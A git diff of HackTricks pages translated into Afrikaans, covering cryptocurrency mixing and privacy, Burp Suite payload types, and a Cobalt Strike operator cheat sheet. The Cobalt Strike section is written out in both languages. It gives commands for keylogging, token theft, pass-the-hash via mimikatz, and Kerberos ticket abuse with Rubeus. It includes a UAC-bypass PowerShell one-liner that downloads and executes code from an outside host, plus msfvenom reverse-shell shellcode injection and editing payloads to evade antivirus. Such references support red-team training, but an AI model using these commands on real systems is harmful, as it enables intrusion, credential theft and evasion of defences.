Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
Voorbeeldtransaksies wat moontlik CoinJoin gebruik het, sluit in `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` en `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners.
Vir meer inligting, besoek [CoinJoin](https://coinjoin.io/en). Vir 'n soortgelyke diens op Ethereum, kyk na [Tornado Cash](https://tornado.cash), wat transaksies anonimiseer met fondse van mynwerkers.
## PayJoin
A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities.
'n Variasie van CoinJoin, **PayJoin** (of P2EP), vermom die transaksie tussen twee partye (bv. 'n kliënt en 'n handelaar) as 'n gewone transaksie, sonder die kenmerkende gelyke uitsette van CoinJoin. Dit maak dit uiters moeilik om op te spoor en kan die algemene-inset-eienaarskap-heuristiek wat deur transaksie-surveillance-entiteite gebruik word, ongeldig maak.
```plaintext
2 btc --> 3 btc
5 btc 4 btc
```
Transaksies soos die bogenoemde kan PayJoin wees, wat privaatheid verbeter terwyl dit nie onderskeibaar is van standaard bitcoin-transaksies nie.
Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions.
**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy.
**Die gebruik van PayJoin kan tradisionele bewakingsmetodes aansienlik ontwrig**, wat dit 'n belowende ontwikkeling maak in die strewe na transaksionele privaatheid.
# Best Practices for Privacy in Cryptocurrencies
# Beste Praktyke vir Privatiteit in Kriptogeldeenhede
## **Wallet Synchronization Techniques**
## **Balgelykmaak van Beursies Tegnieke**
To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out:
Om privaatheid en veiligheid te handhaaf, is dit noodsaaklik om beursies met die blokketting te sinchroniseer. Twee metodes steek uit:
- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in.
- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found.
- **Volle knoop**: Deur die hele blokketting af te laai, verseker 'n volle knoop maksimum privaatheid. Alle transaksies wat ooit gemaak is, word plaaslik gestoor, wat dit onmoontlik maak vir teenstanders om te identifiseer watter transaksies of adresse die gebruiker belangstel.
- **Kliëntkant blokfiltering**: Hierdie metode behels die skep van filters vir elke blok in die blokketting, wat beursies in staat stel om relevante transaksies te identifiseer sonder om spesifieke belange aan netwerkwaarnemers bloot te stel. Ligte beursies laai hierdie filters af en haal slegs volle blokke binne wanneer 'n ooreenstemming met die gebruiker se adresse gevind word.
## **Utilizing Tor for Anonymity**
## **Die Gebruik van Tor vir Anonimiteit**
Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network.
Aangesien Bitcoin op 'n eweknie-netwerk werk, word dit aanbeveel om Tor te gebruik om jou IP-adres te verberg en sodoende privaatheid te verbeter wanneer jy met die netwerk skakel.
## **Preventing Address Reuse**
## **Voorkoming van Adres Hergebruik**
To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design.
Om privaatheid te beskerm, is dit noodsaaklik om 'n nuwe adres vir elke transaksie te gebruik. Adres hergebruik kan privaatheid in gevaar bring deur transaksies aan dieselfde entiteit te koppel. Moderne beursies ontmoedig adres hergebruik deur hul ontwerp.
## **Strategies for Transaction Privacy**
## **Strategieë vir Transaksie-Privaatheid**
- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks.
- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods.
- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy.
- **Meervoudige transaksies**: Die opsplitting van 'n betaling in verskeie transaksies kan die transaksiebedrag verdoesel, wat privaatheidsaanvalle voorkom.
- **Vermyding van wisselgeld**: Die keuse vir transaksies wat nie wisselgeld-uitsette vereis nie, verbeter privaatheid deur wisselgeld-opsporingsmetodes te ontwrig.
- **Meervoudige wisselgeld-uitsette**: As die vermyding van wisselgeld nie haalbaar is nie, kan die skep van meervoudige wisselgeld-uitsette steeds privaatheid verbeter.
# **Monero: A Beacon of Anonymity**
# **Monero: 'n Baken van Anonimiteit**
Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy.
Monero spreek die behoefte aan absolute anonimiteit in digitale transaksies aan en stel 'n hoë standaard vir privaatheid.
# **Ethereum: Gas and Transactions**
# **Ethereum: Gas en Transaksies**
## **Understanding Gas**
## **Begrip van Gas**
Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded.
Gas meet die berekeningspoging wat nodig is om operasies op Ethereum uit te voer, geprijs in **gwei**. Byvoorbeeld, 'n transaksie wat 2,310,000 gwei (of 0.00231 ETH) kos, behels 'n gaslimiet en 'n basisfooi, met 'n fooi om mynwerkers te motiveer. Gebruikers kan 'n maksimumfooi instel om te verseker dat hulle nie te veel betaal nie, met die oortollige bedrag wat terugbetaal word.
## **Executing Transactions**
## **Uitvoering van Transaksies**
Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data.
Transaksies in Ethereum behels 'n afsender en 'n ontvanger, wat beide gebruikers- of slimkontrakadresse kan wees. Hulle vereis 'n fooi en moet gemyn word. Essensiële inligting in 'n transaksie sluit die ontvanger, die afsender se handtekening, waarde, opsionele data, gaslimiet en fooie in. Merkwaardig word die afsender se adres afgelei uit die handtekening, wat die behoefte daaraan in die transaksiedata elimineer.
These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security.
Hierdie praktyke en meganismes is fundamenteel vir enigiemand wat betrokke wil raak by kriptogeldeenhede terwyl privaatheid en veiligheid vooropgestel word.
## References
## Verwysings
* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
@ -201,16 +195,14 @@ These practices and mechanisms are foundational for anyone looking to engage wit
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

46
burp-suite.md
View file

@ -1,29 +1,27 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
# Basic Payloads
# Basiese Payloads
* **Simple List:** Just a list containing an entry in each line
* **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.
* **Case Modification:** Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
* **Numbers:** Generate numbers from X to Y using Z step or randomly.
* **Brute Forcer:** Character set, min & max length.
* **Eenvoudige lys:** Net 'n lys met 'n inskrywing in elke lyn
* **Runtime-lêer:** 'n Lys wat tydens uitvoering gelees word (nie in geheue gelaai nie). Vir ondersteuning van groot lyste.
* **Gevalverandering:** Pas sekere veranderinge toe op 'n lys van strings (Geen verandering, na kleinletters, na GROOTLETTERS, na 'n korrekte naam - Eerste letter in hoofletters en die res na kleinletters -, na 'n korrekte naam - Eerste letter in hoofletters en die res bly dieselfde -.
* **Getalle:** Genereer getalle vanaf X tot Y met 'n stap van Z of lukraak.
* **Brute Forcer:** Karakterset, minimum & maksimum lengte.
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload om opdragte uit te voer en die uitset deur DNS-versoeke na burpcollab te gryp.
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
@ -32,16 +30,14 @@ Other ways to support HackTricks:
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

238
c2/cobalt-strike.md
View file

@ -1,217 +1,206 @@
# Cobalt Strike
### Listeners
### Luisteraars
### C2 Listeners
### C2 Luisteraars
`Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
`Cobalt Strike -> Luisteraars -> Toevoegen/Bewerken` dan kan jy kies waar om te luister, watter soort beacon om te gebruik (http, dns, smb...) en meer.
### Peer2Peer Listeners
### Peer2Peer Luisteraars
The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
Die beacons van hierdie luisteraars hoef nie direk met die C2 te praat nie, hulle kan daarmee kommunikeer deur ander beacons.
`Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons
`Cobalt Strike -> Luisteraars -> Toevoegen/Bewerken` dan moet jy die TCP of SMB beacons kies
* The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon
* The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`.
* Die **TCP beacon sal 'n luisteraar op die gekose poort stel**. Om aan te sluit by 'n TCP beacon gebruik die opdrag `connect <ip> <port>` van 'n ander beacon
* Die **smb beacon sal luister in 'n pypnaam met die gekose naam**. Om aan te sluit by 'n SMB beacon moet jy die opdrag `link [target] [pipe]` gebruik.
### Generate & Host payloads
### Genereer & Berg payloads op
#### Generate payloads in files
#### Genereer payloads in lêers
`Attacks -> Packages ->`&#x20;
`Aanvalle -> Pakkette ->`&#x20;
* **`HTMLApplication`** for HTA files
* **`MS Office Macro`** for an office document with a macro
* **`Windows Executable`** for a .exe, .dll orr service .exe
* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs)
* **`HTMLApplication`** vir HTA lêers
* **`MS Office Macro`** vir 'n kantoor dokument met 'n makro
* **`Windows Uitvoerbare`** vir 'n .exe, .dll of diens .exe
* **`Windows Uitvoerbare (S)`** vir 'n **stageless** .exe, .dll of diens .exe (beter stageless as staged, minder IoCs)
#### Generate & Host payloads
#### Genereer & Berg payloads op
`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
`Aanvalle -> Web Drive-by -> Geskripteerde Web Aflewering (S)` Dit sal 'n skrip/uitvoerbare lêer genereer om die beacon van cobalt strike af te laai in formate soos: bitsadmin, exe, powershell en python
#### Host Payloads
#### Berg Payloads op
If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
As jy reeds die lêer het wat jy wil berg in 'n webbediener, gaan net na `Aanvalle -> Web Drive-by -> Berg Lêer op` en kies die lêer om op te berg en webbediener konfigurasie.
### Beacon Options
### Beacon Opsies
<pre class="language-bash"><code class="lang-bash"># Execute local .NET binary
<pre class="language-bash"><code class="lang-bash"># Voer plaaslike .NET binêre uit
execute-assembly &#x3C;/path/to/executable.exe>
# Screenshots
printscreen # Take a single screenshot via PrintScr method
screenshot # Take a single screenshot
screenwatch # Take periodic screenshots of desktop
## Go to View -> Screenshots to see them
# Skermskote
printscreen # Neem 'n enkele skermskoot via die PrintScr metode
screenshot # Neem 'n enkele skermskoot
screenwatch # Neem periodieke skermskote van die skerm
## Gaan na View -> Skermskote om hulle te sien
# keylogger
# sleutellogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed
## View > Keystrokes om die gedrukte sleutels te sien
# portscan
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
# poortskandering
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Injecteer poortskandering aksie binne 'n ander proses
portscan [targets] [ports] [arp|icmp|none] [max connections]
# Powershell
# Import Powershell module
# Importeer Powershell module
powershell-import C:\path\to\PowerView.ps1
powershell &#x3C;just write powershell cmd here>
powershell &#x3C;skryf net powershell opdrag hier>
# User impersonation
## Token generation with creds
make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token generated with make_token
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
# Gebruiker simulasie
## Token generasie met geloofsbriewe
make_token [DOMAIN\user] [password] # Skep 'n token om 'n gebruiker in die netwerk te simuleer
ls \\computer_name\c$ # Probeer om die gegenereerde token te gebruik om toegang te verkry tot C$ op 'n rekenaar
rev2self # Hou op om die token wat gegenereer is met make_token te gebruik
## Die gebruik van make_token genereer gebeurtenis 4624: 'n Rekening is suksesvol aangemeld. Hierdie gebeurtenis is baie algemeen in 'n Windows domein, maar kan beperk word deur te filtreer op die Aanmeldingstipe. Soos hierbo genoem, gebruik dit LOGON32_LOGON_NEW_CREDENTIALS wat tipe 9 is.
# UAC Bypass
elevate svc-exe &#x3C;listener>
elevate uac-token-duplication &#x3C;listener>
elevate svc-exe &#x3C;luisteraar>
elevate uac-token-duplication &#x3C;luisteraar>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
## Steal token from pid
## Like make_token but stealing the token from a process
steal_token [pid] # Also, this is useful for network actions, not local actions
## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated &#x3C;current_username> - it's impersonating our own cloned token.
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token from steal_token
## Steel token van pid
## Soos make_token, maar steel die token van 'n proses
steal_token [pid] # Dit is ook nuttig vir netwerkaksies, nie plaaslike aksies nie
## Uit die API-dokumentasie weet ons dat hierdie aanmeldingstipe "die oproeper in staat stel om sy huidige token te kloon". Dit is hoekom die Beacon-uitset sê Impersonated &#x3C;current_username> - dit simuleer ons eie gekloonde token.
ls \\computer_name\c$ # Probeer om die gegenereerde token te gebruik om toegang te verkry tot C$ op 'n rekenaar
rev2self # Hou op om die token van steal_token te gebruik
## Launch process with nwe credentials
spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
## Lancering van proses met nuwe geloofsbriewe
spawnas [domain\username] [password] [luisteraar] # Doen dit vanaf 'n gids met leestoegang soos: cd C:\
## Soos make_token, sal dit Windows-gebeurtenis 4624 genereer: 'n Rekening is suksesvol aangemeld, maar met 'n aanmeldingstipe van 2 (LOGON32_LOGON_INTERACTIVE). Dit sal die oproepende gebruiker (TargetUserName) en die gesimuleerde gebruiker (TargetOutboundUserName) beskryf.
## Inject into process
inject [pid] [x64|x86] [listener]
## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
## Injecteer in proses
inject [pid] [x64|x86] [luisteraar]
## Vanuit 'n OpSec-oogpunt: Moenie kruisplatform-injectie uitvoer tensy jy regtig moet nie (bv. x86 -> x64 of x64 -> x86).
## Pass the hash
## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
## Pass die hash
## Hierdie wysigingsproses vereis patching van LSASS-geheue wat 'n hoë-risiko-aksie is, vereis plaaslike admin-voorregte en is nie altyd lewensvatbaar as Protected Process Light (PPL) geaktiveer is nie.
pth [pid] [arch] [DOMAIN\user] [NTLM hash]
pth [DOMAIN\user] [NTLM hash]
## Pass the hash through mimikatz
## Pass die hash deur mimikatz
mimikatz sekurlsa::pth /user:&#x3C;username> /domain:&#x3C;DOMAIN> /ntlm:&#x3C;NTLM HASH> /run:"powershell -w hidden"
## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
steal_token &#x3C;pid> #Steal token from process created by mimikatz
## Sonder /run, sal mimikatz 'n cmd.exe spawn, as jy as 'n gebruiker met 'n skerm hardloop, sal hy die skerm sien (as jy as SYSTEM hardloop, is jy reg om te gaan)
steal_token &#x3C;pid> #Steel token van proses wat deur mimikatz geskep is
## Pass the ticket
## Request a ticket
## Pass die kaartjie
## Versoek 'n kaartjie
execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;username> /domain:&#x3C;domain> /aes256:&#x3C;aes_keys> /nowrap /opsec
## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
## Skep 'n nuwe aanmeldsessie om saam met die nuwe kaartjie te gebruik (om nie die gekompromitteerde een te oorskryf nie)
make_token &#x3C;domain>\&#x3C;username> DummyPass
## Write the ticket in the attacker machine from a poweshell session &#x26; load it
## Skryf die kaartjie in die aanvaller se masjien vanuit 'n poweshell-sessie &#x26; laai dit
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
## Pass the ticket from SYSTEM
## Generate a new process with the ticket
## Pass die kaartjie vanaf SYSTEM
## Skep 'n nuwe proses met die kaartjie
execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;USERNAME> /domain:&#x3C;DOMAIN> /aes256:&#x3C;AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## Steal the token from that process
## Steel die token van daardie proses
steal_token &#x3C;pid>
## Extract ticket + Pass the ticket
### List tickets
## Haal kaartjie uit + Pass die kaartjie
### Lys kaartjies
execute-assembly C:\path\Rubeus.exe triage
### Dump insteresting ticket by luid
### Dump interessante kaartjie deur luid
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:&#x3C;luid> /nowrap
### Create new logon session, note luid and processid
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### Insert ticket in generate logon session
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
### Finally, steal the token from that new process
### Skep 'n nuwe aanmeldsessie, neem luid en proses-ID op
execute-assembly C:\pad\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### Voeg kaartjie in in gegenereerde aanmeldsessie
execute-assembly C:\pad\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-kaartjie...]
### Steel uiteindelik die token van daardie nuwe proses
steal_token &#x3C;pid>
# Lateral Movement
## If a token was created it will be used
jump [method] [target] [listener]
## Methods:
## psexec x86 Use a service to run a Service EXE artifact
## psexec64 x64 Use a service to run a Service EXE artifact
## psexec_psh x86 Use a service to run a PowerShell one-liner
## winrm x86 Run a PowerShell script via WinRM
## winrm64 x64 Run a PowerShell script via WinRM
# Laterale beweging
## As 'n token geskep is, sal dit gebruik word
jump [metode] [teiken] [luisteraar]
## Metodes:
## psexec x86 Gebruik 'n diens om 'n Service EXE-artefak uit te voer
## psexec64 x64 Gebruik 'n diens om 'n Service EXE-artefak uit te voer
## psexec_psh x86 Gebruik 'n diens om 'n PowerShell-eenreëliner uit te voer
## winrm x86 Voer 'n PowerShell-skripsie uit via WinRM
## winrm64 x64 Voer 'n PowerShell-skripsie uit via WinRM
remote-exec [method] [target] [command]
## Methods:
<strong>## psexec Remote execute via Service Control Manager
</strong>## winrm Remote execute via WinRM (PowerShell)
## wmi Remote execute via WMI
remote-exec [metode] [teiken] [opdrag]
## Metodes:
<strong>## psexec Voer op afstand uit via die Diensbeheerder
</strong>## winrm Voer op afstand uit via WinRM (PowerShell)
## wmi Voer op afstand uit via WMI
## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
## Om 'n beacon met wmi uit te voer (dit is nie in die jump-opdrag nie) laai net die beacon op en voer dit uit
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
# Pass session to Metasploit - Through listener
## On metaploit host
# Gee sessie aan Metasploit - Deur middel van 'n luisteraar
## Op Metasploit-gashuis
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j
## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
## Op cobalt: Luisteraars > Voeg by en stel die Payload in op Foreign HTTP. Stel die Host in op 10.10.5.120, die Poort op 8080 en klik op Stoor.
beacon> spawn metasploit
## You can only spawn x86 Meterpreter sessions with the foreign listener.
## Jy kan slegs x86 Meterpreter-sessies spawn met die vreemde luisteraar.
# Pass session to Metasploit - Through shellcode injection
## On metasploit host
# Gee sessie aan Metasploit - Deur middel van shellcode-injeksie
## Op Metasploit-gashuis
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=&#x3C;IP> LPORT=&#x3C;PORT> -f raw -o /tmp/msf.bin
## Run msfvenom and prepare the multi/handler listener
## Voer msfvenom uit en berei die multi/handler-luisteraar voor
## Copy bin file to cobalt strike host
## Kopieer binêre lêer na cobalt strike-gashuis
ps
shinject &#x3C;pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
shinject &#x3C;pid> x64 C:\Payloads\msf.bin #Injecteer Metasploit shellcode in 'n x64-proses
# Pass metasploit session to cobalt strike
## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
# Gee Metasploit-sessie aan cobalt strike
## Genereer stageless Beacon shellcode, gaan na Aanvalle > Pakkette > Windows Uitvoerbare lêer (S), kies die gewenste luisteraar, kies Raw as die Uitvoertipe en kies Gebruik x64-payload.
## Gebruik post/windows/manage/shellcode_inject in Metasploit om die gegenereerde cobalt strike shellcode in te spuit
# Pivoting
## Open a socks proxy in the teamserver
## Maak 'n sokkiesproksi oop in die spanbediener
beacon> socks 1080
# SSH connection
beacon> ssh 10.10.17.12:22 username password</code></pre>
# SSH-verbinding
beacon> ssh 10.10.17.12:22 gebruikersnaam wagwoord</code></pre>
## Avoiding AVs
## Vermy AV's
### Artifact Kit
### Artefaktkit
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
Gewoonlik in `/opt/cobaltstrike/artifact-kit` kan jy die kode en vooraf saamgestelde sjablone (in `/src-common`) van die payloads vind wat cobalt strike gaan gebruik om die binêre beacons te genereer.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
